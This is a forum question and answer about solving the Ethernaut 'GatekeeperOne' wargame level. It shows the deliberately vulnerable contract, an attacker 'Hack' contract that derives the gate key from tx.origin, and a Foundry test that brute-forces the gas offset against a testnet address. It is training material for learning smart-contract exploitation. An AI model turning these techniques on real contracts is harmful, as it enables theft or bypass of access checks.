# How can I control how much gas is left in the middle of a function?

Tags: gas

I am working on an ethernaul challenge (below). The challenge is to successfully call enter(). I have it all solved except for the part where gasleft() % 8191 has to be 0. I tried using a while (while gasleft % 8191 != 0) but that didn't work. I also tried measuring how much the modifier gateOne would cost in gas and then adding that to gasleft (btw it is 42) but that didn't work either.

So my question is how do I control gasleft()?

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract GatekeeperOne {

  address public entrant;

  modifier gateOne() {
    require(msg.sender != tx.origin);
    _;
  }

  modifier gateTwo() {
    require(gasleft() % 8191 == 0);
    _;
  }

  modifier gateThree(bytes8 _gateKey) {
      require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), "GatekeeperOne: invalid gateThree part one");
      require(uint32(uint64(_gateKey)) != uint64(_gateKey), "GatekeeperOne: invalid gateThree part two");
      require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin)), "GatekeeperOne: invalid gateThree part three");
    _;
  }

  function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
    entrant = tx.origin;
    return true;
  }
}
```

Answer (score 2):

So this would be the hack contract where you will pass the gas amount.

Notice we pass `8191 *10 +gas` so that some extra gas is there and it should be completely divisible by 8191.

```
   contract Hack {
    function enter(address _target, uint256 gas) external {
        IGateKeeperOne target = IGateKeeperOne(_target);
        // k = uint64(key)
        // 1. uint32(k) = uint16(k)
        // 2. uint32(k) != k
        // 3. uint32(k) == uint16(uint160(tx.origin))

        // 3. uint32(k) == uint16(uint160(tx.origin))
        // 1. uint32(k) = uint16(k)
        uint16 k16 = uint16(uint160(tx.origin));
        // 2. uint32(k) != k
        uint64 k64 = uint64(1 << 63) + uint64(k16);

        bytes8 key = bytes8(k64);

        require(gas < 8191, "gas > 8191");
        require(target.enter{gas: 8191 * 10 + gas}(key), "failed");
    }
}
```

Now we can run a test to find out how much gas is used to pass the modifier. In this test case, we are running a test that keeps calling the enter function with a particular gas value incrementing 1 at a time until it's successful. And the moment it's successful, we log the gas amount that was used. In this case, it was 256.
Make sure to run the test in a forked testnet.

```
pragma solidity ^0.8;

import "forge-std/Test.sol";
import "forge-std/console.sol";

import "src/13-gate-keeper-one.sol";

contract TestGateKeeperOne is Test {
    IGateKeeperOne private target;
    // GatekeeperOne private target;
    Hack private hack;

    function setUp() public {
        target = IGateKeeperOne(0x037e210a2575f2f57207540c3a33AF1C03Eaef39);
        // target = new GatekeeperOne();
        hack = new Hack();
    }

    function test() public {
        for (uint256 i = 100; i < 8191; i++) {
            try hack.enter(address(target), i) {
                console.log("gas", i);
                return;
            } catch {}
        }
        revert("all failed");
    }
}
```